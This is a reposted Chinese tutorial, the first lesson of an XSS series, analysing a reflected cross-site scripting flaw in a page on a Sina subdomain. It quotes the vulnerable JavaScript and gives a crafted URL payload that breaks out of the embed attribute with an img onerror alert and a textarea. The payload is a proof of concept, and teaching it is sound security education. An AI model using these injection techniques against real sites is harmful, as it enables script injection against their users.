来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 第一课 http://www.2cto.com/Article/201301/186359.html新浪的XSS自然比腾讯更多,这里只讨论IE浏览器下的情况,其它浏览器可能需要做一些变形。纯粹的完全无过滤确实不太好找,这个其实是输出...
第一课 http://www.2cto.com/Article/201301/186359.html
新浪的XSS自然比腾讯更多,这里只讨论IE浏览器下的情况,其它浏览器可能需要做一些变形。
纯粹的完全无过滤确实不太好找,这个其实是输出在HTML属性里,严格来说应该算是第三课的扩展,不过算了,勉强算是没有任何过滤吧。第三课的时候我找个输出在<input value= 的例子。
漏洞地址:
http://bt.house.sina.com.cn/zdy/page/lc600_sp.html?url=68397653_2202974785_Z0u3GCJuDm7K+l1lHz2stqkP7KQNt6nni2q2slWgIgZcQ0/XM5Gfat4O5y/TA9kEqDhAQpA8fPkg0h4
漏洞成因:
var str=window.location.href;
var es=/url=/;
es.exec(str);
var right=RegExp.rightContext;
……
<embed id=sp pluginspage='http://www.macromedia.com/go/getflashplayer' src='http://you.video.sina.com.cn/api/sinawebApi/outplayrefer.php/vid="+right+"/s.swf' type=……
URL取得的内容未做任何过滤,直接带入到embed标签内。很典型的XSS。
构造地址:
http://bt.house.sina.com.cn/zdy/page/lc600_sp.html?url=11">'><img src=1 onerror=alert(1);><textarea>
附加说明:
1 为啥要用">'>:实际测试中,如果我用单引号,引用地址会变成双引号;如果我用双引号,它就用单引号引用。我怒了, 干脆都加上,总有一款适合你。
2 最近比较喜欢使用<textarea>屏蔽后面的东西。
3 如果有时间,我可能会专门做一期XSS代码对于各个浏览器兼容的处理。
修复方案:
嗯..问瘦子。
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com